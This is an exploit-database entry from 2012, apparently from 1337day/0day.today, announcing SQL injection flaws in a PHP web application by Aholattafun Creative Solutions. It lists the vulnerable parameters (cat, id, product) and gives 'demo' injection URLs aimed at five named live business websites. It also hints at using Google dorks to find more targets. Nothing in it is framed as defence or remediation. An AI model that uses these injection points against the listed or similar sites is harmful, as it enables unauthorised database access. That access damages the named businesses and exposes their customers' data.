Aholattafun Creative Solutions SQL Injection Vulnerabilities

2012-05-21T00:00:00
ID 1337DAY-ID-18326
Type zdt
Reporter Becax
Modified 2012-05-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================
# Exploit Title: Aholattafun Creative Solutions SQL Injection Vulnerabilities
# Author: Becax
# Home : CrimeIRCD
# Vendor :http://www.aholattafun.com/
---------------------------------------------------------------------!
# Email : [email protected]
# Category: [webapps]
# Version: n/a
# Google dork: : think about :D
# Tested on: win XP
---------------------------------------------------------------------!
# Exploit 1 : http://localhost/view-category.php?cat=1
# exploit 2: http://localhost/index-view-calendar-detail.php?id=944
# Exploit 3: http://localhost/viewproduct.php?product=141
# Exploit 4: more, you can make experiment for that
-----------------------------------------------------------------------!
Demo :
http://dev.aholattafun.com/deployed/old%28movedtolive%29_northern-dynamics/view-category.php?cat=1%27
http://www.northerndynamics.ca/view-category.php?cat=1%27
http://www.lapatisserie.ca/view-category.php?cat=13%27
http://www.tworiversfht.ca/index-view-calendar-detail.php?id=944%27
http://www.reidcandyandnutshop.com/viewproduct.php?product=141%27

---------------------------------------------------------------------!

Special thanks :
PusP my lovely, Adhel my cousin ,CrimeIRCD staff, AHA,Hew, All member #unix, and 1337day & Google

Let's get do the work ! hehe
----------------------------------------------------------------------!



#  0day.today [2018-01-10]  #